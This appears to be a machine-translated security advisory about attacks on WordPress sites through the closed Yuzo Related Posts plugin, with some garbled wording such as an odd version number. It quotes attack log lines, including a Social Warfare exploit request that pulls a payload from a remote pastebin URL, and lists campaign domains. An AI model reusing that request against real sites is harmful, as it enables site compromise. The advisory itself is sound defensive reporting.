The WordPress plugin repository team can "plug in" plugins and limit downloads when they hear about a security issue that developers can not fix quickly.
However, bad actors actively monitor the WordPress plugin repository and pay close attention to these closed plugins. This can lead to massive attacks if the attacker can detect and exploit the vulnerability.
That's the case for the plugin Yuzo-related post execution 12/5/91 This was closed on March 30, so new users could not download it. But last time we looked 60,000+ active installations.
Unfortunately, bad actors caused the sites to be searched for this plugin to see if it was installed:
220.127.116.11 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP / 1.1" - - "-" "Mozilla / 5.0 (Windows NT 6.1; Win64; x64; rv: 64.0) Gecko / 20100101 Firefox / 64.0 "
Addition to an existing malicious campaign
We recently reported how attackers abused multiple plugins by injecting malicious scripts into them. This is a typical, current example of how this Malare campaign targets websites with a vulnerable Social Warfare plug-in:
18.104.22.168 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=hxxps: // pastebin[.]de / raw / HeKe9uqn HTTP / 1.1 "- 0" - "" - "
We see that new domains are also used:
clevertrafficincome[.]com - Creation Date: 2019-04-05 Hellofromhony[.]org - Creation Date: 2019-04-09 notifymepush[.]info Pushmeandtouchme[.]info
As we can see from the original IP address, this malware campaign has the Yuzo-related post Plugin into their list of goals.
Details of the vulnerability
especially the Yuzo-related post Plugin has one unauthenticated cross-site scripting Error. Several other vulnerabilities were also not resolved – this was the main reason why the WordPress team had closed it.
In order to give users time to remove this plugin from their websites, we do not provide any further details here. Remember that attackers are already exploiting it.
Today, April 10, 2019, we see many posts about hacks from sites using the plugin in the WordPress support forum. The plugin author even had to announce that the plugins should be uninstalled immediately.
If you can not remove this plugin, we recommend that you add a second level of security that virtually fixes vulnerabilities if developers do not solve the security issues.